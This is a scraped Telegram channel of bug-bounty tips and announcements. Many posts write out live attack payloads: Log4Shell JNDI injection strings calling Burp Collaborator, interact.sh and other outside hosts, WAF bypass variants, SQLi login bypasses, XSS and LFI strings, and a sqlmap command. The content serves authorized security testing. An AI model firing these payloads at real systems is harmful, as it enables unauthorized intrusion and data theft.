Bug Hunting Hub
890 subscribers
17 photos
427 links
The source of insights for Bug Hunters. The channel is driven by bot, curated by twitter.com/makrushind
instagram.com/makrush.in
Download Telegram
to view and join the conversation
Designed the “Application Security Fundamentals” course for Information Security students of my alma mater, I'm giving back and together with my friends from industry cultivate the design thinking of next generation alumni: shift the mindset from problem discovery to solution architecture.

Three years after launching, to increase the impact of this course, we made our lectures open to every Russian-speaking student. Just register yourself using the link and wait for the announcement of open lecture tomorrow.

The photo illustrates how a typical class looks like - somewhere with laptop. Grab your device, headset and join!

Spoiler: tomorrow at 6:00 pm (GMT+3) Daniil Bannykh, our Bug Hunting Hub master, will share "Stateful API Fuzzing: Challenges, Tactics and Tools" (Russian language).

Registration: https://t.me/+xbXoZrK5pV9iMmEy
#BugBountyTips of the Day
Find domains of diferent extensions wget -q -O - " https://t.co/Zk0k5u9Oyz" | sed 's/FUZZ/www.DOMAIN/g' | httpx -title -status-code -location @DragonJAR #cybersecurity #bugbounty #bugbountytips #infosec #pentest https://t.co/EFGZsWEnFa
---
⭐️⭐️⭐️#Pro Cloudflare SQLi Bypass by 'Cyber Guy' #WAFBypass #SQLi #BugBounty #BugBountyTip #BugBountyTips https://t.co/EsvOOXoMVs
---
hello @pdnuclei @pdiscoveryio - community, we made you a cookie and hope you like it https://t.co/KOawiyCn4Y #dfir #bughunting #blueteam #bugbounty https://t.co/QZc6OLBfah
---
scrape subdomains from SSL certs with cero ssl_scrape(){ whois -h https://t.co/qmduAl3QtJ -- "-i origin $1" | grep -Eo "([0-9.]+){4}/[0-9]+" | uniq | mapcidr -silent | cero -c 500 -d -p 443,8443,10443 | tee -a output.txt } #bugbounty #cybersecuriy #infosec https://t.co/Y3PPGTNgDI
---
If you're hunting for low-hanging bugs in source code, grep and regex can help you to identify hotspots. For example, you might find basic rXSS in PHP with something like this: grep -r "echo.*\$_\(GET\|REQUEST\|POST\)" . #BugBountyTips 🤗
#BugBountyTips of the Day
Great day to have a Bug Bounty program, instead of getting rekt in the weekend - you are patching a critical 0 day in a matter of hours and paying for it 5k$ max #BugBounty works. #log4j2
---
One-ish liner for #Log4J #RCE cat hosts.txt | sed 's/ https\?:\/\///' | xargs -I {} echo '{}/${jndi:ldap://{}.attacker.burpcollaborator.net}' >> log4j.txt httpx -l log4j.txt Look for callbacks in your server. It should be VICTIM.ATTACKER.burpcollab #bugbountytips #bugbounty
---
#bugbountytips #bugbounty File Upload to RCE #pentest #appsec 1. Bypass the filter upload 2. PHP Exploit 3. Remote Code Execution More.. https://t.co/c0E6voMAE3 https://t.co/IaHnoaGdfx
#BugBountyTips of the Day
Scanning Log4j RCE - CVE-2021-44228 using Nuclei Template shared by @_melbadry9 @daffainfo @DhiyaneshDK Template - https://t.co/w4bZ7RFAA1 Reference - https://t.co/szPUqUhNEB #hackwithautomation #bugbounty #pentest #security https://t.co/oOfLzdzk0w
---
Apache Log4j RCE Attack Flow - ExploitWareLabs #bugbountytips #bugbounty #log4j #CVE #cybersecurity #infosec https://t.co/bSKC3i6h1Y
---
Wohooo, Me and @theabrahack just got awarded a bounty of $15,000 on @Hacker0x01 for log4j RCE , I love how some companies treat zero days #bugbounty
---
How many times have you been overwhelmed yet when checking out JS files on a website? 😰 Be smart and analyse them in a structured way 🗽 @imranparray101 is here for you with some examples 💪 #bugbountytips 👇 https://t.co/Z3k6aUnehl
---
ADenum - A Pentesting Tool That Allows To Find Misconfiguration Through The The Protocol LDAP And Exploit Some Of Those Weaknesses With Kerberos https://t.co/M1ymtVeeDs #cybersecurity #bugbountytips #hacking #tools https://t.co/AOjhxAG3T4
---
Don't forget to use the handy Burp Proxy Match and Replace rules for finding #Log4Shell, while browsing targets. Pretty simple but effective. #bugbountytips #bugbounty #infosec #cybersecurity #log4j https://t.co/HwRK0NxpaC
---
Log4j2 RCE Passive Scanner plugin for BurpSuite https://t.co/PwgT68Mu21 #bugbountytips #bugbounty #cybersecurity #CVE #java #infosec
---
I think I’m the first one to get bounty for log4j RCE , $300 on an Informative Report #bugbounty
#BugBountyTips of the Day
Verify Java Version, if not vulnerable don't bother and go to the next target! How? ${jndi:ldap://${env:JAVA_VERSION}.5ou7zt0bj640uqc0bsy1hvyrpiv8jx.burpcollaborator.net} #bugbountytips https://t.co/ZHxYVKD1ns
---
Found a bypass working for a few WAF ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} Enjoy bounty season with #log4j #Log4Shell #log4jRCE #bugbountytip https://t.co/ZhuA0WdzN7
---
If you have a Struts2 target, you can try to find if its vulnerable to #Log4Shell curl -vv -H "If-Modified-Since: \${jndi:ldap://localhost:80/abc}" http://localhost:8080/struts2-showcase/struts/utils.js #bugbountytips #log4jRCE #bugbounty #infosec #cybersecurity #redteam 1/n https://t.co/agUISHuQWF
---
This week is great so I can take a rest this month #bugbounty 👀 https://t.co/D80srO8hsC
---
~Admin Panel Accessed via sqli #bugbountytips @0xmahmoudJo0 1- Search for Login panels through @shodanhq with this dork: org:"TARGET" http.title:"login" 2- Bypass login with old way: admin' or 1=1 #BugBounty #bugbountytip #cybersecurity #sqli https://t.co/Tu4rn9gS0u
#BugBountyTips of the Day
The famous #log4j👀 #bugbounty https://t.co/XJ7H6zfGoH
---
403-bypass: a collection of wordlists, FFUF commands, and nuclei templates to bypass 403. 🔗 https://t.co/8jHoX0McY2 #bugbounty #cybersecurity #infosec #wordlists #403bypass
---
log4j-scan A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts #log4j #Log4Shell #infosec #log4j2 #bugbountytips #bugbounty https://t.co/LO8LQONozj
---
I just published a new write-up at Medium! How I found a IDOR issue in 5 mins? https://t.co/szEs07XZok Please ask through direct message if you have any question about bugbounty or information security! Have a great day y'all. :) #bugbounty #infosec #hackerone #bugbountytips https://t.co/51YYWizPpH
---
trying to test every header of a website for #log4j? Use BurpSuite and the Pitchfork attack in the Intruder and set both payloads to the header values: ${jndi:ldap://${hostName}.§§.${sys:java.version}.cb.io} now you know the vuln header :) #bugbounty #bugbountytips https://t.co/E2TTRhRVlT
#BugBountyTips of the Day
XSS filter bypass payload: \"+confirm(1)+" #bugbountytips #bugbountytip #bugbounty #cybersecurity https://t.co/6BVE1ZBelv
---
So proud to announce that today I have completed my 2021 bug bounty goal of $40,000 by just working for 4 months , Happy to achieve this at the age of 17 , Goal is to be a millionaire by 20 , Big thanks to Bug Bounty @Hacker0x01 @SynackRedTeam #BugBounty
---
SQL Injection #bugbountytips #bugbountytip In username , email parameter login , signup , forget for #Oracle Add This Sleep Payload For Your SQL Payload List orwa'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)||' Happy Hunting Dears
---
Receiving dns response doesn't mean it's vulnerable. so, try this to verify it's vulnerable or not. ${env:JAVA_VERSION} ${sys:java.version} ${hostName} ${sys:java.vendor} #bugbountytip #bugbounty #bughunting #log4j2 #log4jshell #rce #vulnerability #Bug https://t.co/Qw5LvhsjAX
---
#BugBounty #cybersecurity Fuzz header body and path to find Log4j2 jndi injection https://t.co/sioDMttoqt https://t.co/gi80xsPjfp
---
Happy to be part of @Hacker0x01 All Time Top 100 Leaderboard 🙏 #BugBounty https://t.co/NAHCMBsJVd
#BugBountyTips of the Day
Just bypassed AWS WAF for log4j jndi injection: ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} Anyone who care to share Akamai Bypass? #bugbountytips https://t.co/QaoavD326z
---
XSS filter bypass payload: @Mah3Sec_ \"+confirm(1)+" #bugbountytips #bugbountytip #bugbounty #cybersecurity https://t.co/wvEjQCjVVJ
---
What interesting variants of #Log4j payloads have you seen in the wild so far, in your SIEM/logs? 🧵 GET request parameter: ?x=${jndi:ldap://${hostName}.c6rdo2a9xxxxxxhyben.interactsh.com/a #infosec #cybersecurity #bugbounty #blueteam #log4shell 1/n https://t.co/P0edz3UTSC
#BugBountyTips of the Day
Are you ready to hunt for bugs in this program ? 50$ for critical 😄 #BugBounty https://t.co/ff3aa5Wg8U
---
(1/2) LFI WAF Bypass @TodayCyberNews file:/etc/passwd?/ file:/etc/passwd%3F/ file:/etc%252Fpasswd/ file:/etc%252Fpasswd%3F/ file:///etc/?/../passwd file:///etc/%3F/../passwd file:${br}/et${u}c/pas${te}swd?/ file:$(br)/et$(u)c/pas$(te)swd?/ #bugbounty #bugbountytips #infosec
---
Previous AWS WAF bypass is patched.. here is another: ${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o} #bugbountytips #LOG4JDONTRELYONWAF https://t.co/7FmkM9mHZe
---
Pinaki (@0xInfection) from our team has written a fantastic tool 'Log4Hunt' to scan for #log4jshell vulnerability. It accepts a URL or a list of URLs as input and uses Canary Tokens (Thanks @ThinkstCanary) Happy Friday😎 https://t.co/MAVM3rfPqY #opensource #bugbounty
---
How I am able To Account Takeover Of @Pornhub ( Porn Creator ). Bounty :- $1,632 Bug is Bxss ( Send fake Copyright strike to Porn Creator with blind Xss Payload. ) #MrRajputHacker #bugbounty #bugbountytips #infosec #cybersecurity https://t.co/DvchUFTvbt
#BugBountyTips of the Day
In the username parameter 🎯 @0xFalah payload : <img src=xss onerror=alert(1)> #BugBounty #CyberSecurity #bugbountytips ( hackerone ) $450 😉 https://t.co/bVRIKf3rLb
---
Log4j 2.16 vulnerability DoS Paylaod: ${${::-${::-$${::-j}}}} refer to: https://t.co/c5oaWhQWVY #log4j #Log4Shell #log4Hell #BugBounty #bugbountytips https://t.co/Skl1FwQP1p
---
Why doing all the recon by yourself if it already has been done? 🤦‍♀️ Sometimes you just need the right tools 👨‍💻 And @rbhichher has one ready for you today 🎄 #bugbountytips 👇 https://t.co/nMWG4lN3pd
---
[Blog Post] Flickr: Zero User-Interaction Account Takeover 👉 https://t.co/sv9GGuCgfm 👉 https://t.co/fxj3griIHB #appsec #sso #aws #cognito #flickr #bugbounty https://t.co/Dq7ipDZKm4
---
Flickr disclosed a bug submitted by @_lauritz_: https://t.co/SFz2nfVeeZ - Bounty: $7,550 #hackerone #bugbounty https://t.co/QO3wzRilcu
#BugBountyTips of the Day
Log4J Vulnerability Flyer🔥Logs on Fire🔥 Covered in flyer: - Log4J - Lookup Plugins - JNDI Lookup - JNDI <-> LDAP Lookup - Working of attack Read Here : https://t.co/0AkX7IQBq2 #infosec #appsec #security #bugbountytips #bugbounty #Hackers #zine #webappsec #cybersecurity https://t.co/h9lftLFMbA
---
A tool for bug bounty recon #bugbounty #bughunting #recon #bug #tools #bugbountytips #bugbountytip #bugbountytool #bugbountytools LINK : https://t.co/wAVjdikrmY https://t.co/AAH6A2NzF6
---
https://t.co/Bnwt05dIJa New writeup for 2022! #BugBounty #bugbountytips #bugbountytip
---
El Webinar Gratuito: "Romper Contraseñas con Tablas Arco Iris" está disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics https://t.co/Z9YRtclEDz https://t.co/Q3fpMwcrVU
---
New machine for the new year, M1 Max 16 Inch 32GB Ram, maybe now I can start using a certain tool named BurpSuite : ) #BugBounty https://t.co/gyNMxNSteW
---
Best Resources and Best Cyber Security Cheat Sheets Active Directory Cheat Sheet : https://t.co/s3XVbwWlD4 A Guide On Log4j Penetration Testing : https://t.co/nTPWj6agGJ #cybersecurity #BugBounty #bugbountytips @theXSSrat @ADITYASHENDE17 @zseano @NahamSec
---
Top 5 Bug Bounty Platforms! #cybersecurity #ethicalhacking #bugbounty #bugbountytips https://t.co/El8pE3aBSr
---
Yay, i was awarded 2,200 $ bounty from @zoho, I just achieved one of my 2021 bug bounty goals. $1,200 + 800$ + $200 2 RCE and 2 XSS "Its always seems impossible until its done" #bugbounty #infosec #bounty https://t.co/eWRDje3D61
---
El Webinar Gratuito: "Análisis Forense al Firewall de Windows" está disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics https://t.co/P5qra0PY6R https://t.co/CCyMOvOqHf
---
5 ways to make money with #ethicalhacking 5) Repairing virus-ridden PC's/hacked networks 4) Pentesting 3) Making youtube videos about it 2) Writing medium articles about it 1) #BugBounty Good luck amazing hackers <3
#BugBountyTips of the Day
Tip? Use nuclei 😉 #bugbountytips https://t.co/smMR7oIfe1
---
Scan for MobileIron Log4J JNDI RCE using nuclei template shared by meme-lord Template - https://t.co/pLVs6GTjrF Reference - https://t.co/YHQ2Kdoc0I #hackwithautomation #bugbounty #pentest #security https://t.co/K0oLrahPiX
---
My First P1 Bounty 🎉🤩 I earned $2,500 for my submission on @bugcrowd https://t.co/X8dLRuhTUG #ItTakesACrowd #bugbounty #Hackers
#BugBountyTips of the Day
Working AWS/Cloudfront #log4j WAF Bypass within the URI path http:\/\/hostname.com/${jndi${nagli:-:}ldap:${::-/}/${hostName}.anything.interact.sh/a}} Please note that AWS WAF is self configurable, but I got hits on ~100 websites today with this payload. #BugBounty https://t.co/7awtKeCRbN
---
This is how it all Started, SS is for those who get demotivated after some attempts only. Starts may be small, don’t worry, you have started. @Bugcrowd @caseyjohnellis @aflores2424 @fransrosen @Jhaddix #bugbounty #infosecurity https://t.co/RmIgnkGDx6
---
You can inject header too with SQLi POC: sqlmap -u " https://t.co/KZfy5GompT" --header="X-Forwarded-For: 1*" --dbs --batch --random-agent --threads=10 Injection marker: * #bugbounty #bugbountytips https://t.co/YcLtF87ESu
---
My First #log4jrce on @Hacker0x01 😍😍😍 Log4j CVE-2021-44228 #bugbountytips #BugBounty #hackers #Log4Shell https://t.co/X25Z7afUN2
---
Yay, I was awarded a $5,120 bounty on @Hacker0x01 ! Bug : Complete Log4j RCE #TogetherWeHitHarder @Hacker0x01 #bugbounty Thanks @Hacker0x01 https://t.co/c9qPfR9HnV
---
My 2022 BugBounty Goals🎯: - 20k in Bounties - 2000 Reputation points on @Hacker0x01 - 20x swags from Sony (For local charity center) - 20x RedBull trays (For local charity center) - [Redacted] #bugbounty #togtherwehitharder
---
Python libraries and frameworks #MachineLearning #python #100Daysofcode #programming #CodeNewbie #reactjs #bugbounty #DataScience #gamedev #BigData #DataScience #MachineLearning #NeuralNetworks #CES2022 #OpenSource #AI #5G #IoT #DEVCommunity #codinglife via @atishkumarjain https://t.co/T97il23Y6E
#BugBountyTips of the Day
If you collected a bunch of alive IP addresses. Don't run @pdnuclei directly on it, Firstly make a Full port scanning then run it, maybe you find some juice stuff on other ports like what I got XD !! The command: https://t.co/cB2zpzZez2 #bugbountytips #BugBounty #CyberSecurity https://t.co/olc8Y72xpz
---
Android App Reverse Engineering 101 - by @maddiestone https://t.co/qa5V4R8d9N #bugbounty #android #cybersecurity #malware https://t.co/3SHMTZYOEg
---
In this post, we will discuss the many strategies that a pentester can employ to transfer data to the target PC ( Windows and Linux Machine). #bugbountytips #Linux #WebSecurity #cybersecurity #Ethicalhacking #hacking #Linux #itsecurity #infosec https://t.co/zlF9IFwutl
---
Massive Collection of all #MacOS And #IOS Related Vulnerabilities Docs in One Go! #infosec #bugbounty #bugbountytips https://t.co/fHl2WsXOjW
---
I earned $1,500 for my submission on @bugcrowd https://t.co/adNqMtGQMK #ItTakesACrowd Abusing an Open Redirection within the Oauth flow to steal the Google access token and login into the user's account. #cybersecurity #bugbounty #infosec #informationsecurity https://t.co/tKvaCXPdwZ
---
Web Cache Vulnerability Scanner #bugbounty #cybersecurity #infosec https://t.co/EYEoRslhiJ
#BugBountyTips of the Day
El Webinar Gratuito: "Google Hacking" está disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics https://t.co/kFwav2QUuw https://t.co/CIIZdK4zV0
---
“Decoding PDF Injection” by Urshila https://t.co/G0ruWowrhY #bugbounty #hacking #infosec
---
New #log4j 2.17.0 RCE may be assigned as CVE-2021-44832 #CVE-2021-44832 Vulnerability confirmed!!! #bugbounty #cybersecurity #apache
---
El Webinar Gratuito: "Explotación con Kali Linux" está disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics https://t.co/0vytpnm8QY https://t.co/omdwhQ8hdD
---
Top 20 Most Popular Hacking Tools in 2021 https://t.co/TL3DTtNauI #cybersecurity #bugbountytips #hacking #tools https://t.co/ahxYRFWRIM
---
Here is my biggest 2021 goal. ...is completed In May 2021 I started the bug bounty ...and today I found my name in @GoogleVRP @Apple @Microsoft I'm always Thankful - my bro , my mentor - @ADITYASHENDE17 #bugbounty #bughunter https://t.co/kxUyjxVJGN
---
Reflected- Cross Site Scripting on login user account Payload : javascript:alert(1) javascript:alert(document.cookie) #bugbounty #bugbountytips https://t.co/nCw2T7TWdY
---
https://t.co/3r30wz8xys A simple website to guess API Key / OAuth Token When you do pentest / Github recon and find API key / OAuth token but you don't know what API key it is, you can use my website that I built from javascript #bugbountytips #bugbounty #infosec https://t.co/0I1LOdzkgs
---
after 5 months of break I am able to find something good 😀. The trending vulnerability. and got 🤑🤑 #Log4Shell #bugbounty #cybersecurity https://t.co/OVLjQCfQH9
---
XSS TIP : to bypass WAF @PecentZero Inserting space before (),[], . is allowed when execute command ,you can replace space with /**/ alert/**/("XSS") alert/**/?.("XSS") alert?./**/("XSS") alert/**/?./**/("XSS") window?./**/[/al/.source+/ert/.source]/**/('XSS') #bugbountytip
Open Lecture about fuzz-method
Anonymous Poll
89%
Yes, go ahead!
11%
Not interesting :(
Hello Bug Hunters!
As you know, for security testing we can use so many methods and techniques 🤓
And we want to ask you about one of them.. What do you know about methods of fuzz testing? 🤔
If you don't know anything about fuzzing or want to jump in this topic, we want to share with you english-based Open Lecture ⚡️
Say "Yes" (!!!) if you're ready to gather more insights in fuzzing and check our poll for that! If we gain enough audience then we will organize the Webinar for Bug Hunting Hub and invite experts in fuzzing. 🕺
Go-go-go!
The "Prototype Pollution" research, performed with co-authorship and strong contribution by Nikita Stupin in Advanced Security Research team, is recognized by community and nominated to the “Top 10 Web Hacking Techniques of 2021”.

This is the best opportunity for all bug hunters, who found the research insightful and especially who got bounties based on it, to support the authors: https://portswigger.net/research/top-10-web-hacking-techniques-of-2021-nominations-open